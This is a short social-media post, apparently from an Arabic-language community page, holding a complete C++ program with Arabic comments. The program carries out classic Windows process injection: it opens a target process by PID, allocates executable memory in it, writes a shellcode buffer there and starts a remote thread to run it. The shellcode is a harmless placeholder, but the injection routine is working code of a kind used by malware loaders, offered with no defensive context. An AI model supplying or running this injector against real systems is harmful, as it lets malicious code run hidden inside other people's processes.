المجتمع
🦈مـ̶ـش ּ🇪🇬 ּ🕸مـ̶ـهـ̶ـتـ̶ـم @ookkoo_77 ·
#include <windows.h> #include <iostream> int main() { // Shellcode وهمي للتمثيل unsigned char shellcode[] = "\\x90\\x90\\x90\\x90\\xcc\\xc3"; SIZE_T shellcodeSize = sizeof(shellcode); // 1. فتح العملية المستهدفة عبر الـ PID DWORD processId = 1234; // معرف العملية HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId); if (hProcess != NULL) { // 2. حجز مساحة ذاكرة داخل العملية المستهدفة LPVOID remoteBuffer = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 3. كتابة الـ Shellcode في المساحة المحجوزة WriteProcessMemory(hProcess, remoteBuffer, shellcode, shellcodeSize, NULL); // 4. إنشاء مسار تنفيذي (Thread) لتشغيل الكود HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); CloseHandle(hThread); CloseHandle(hProcess); } return 0; }
9 لا تعليقات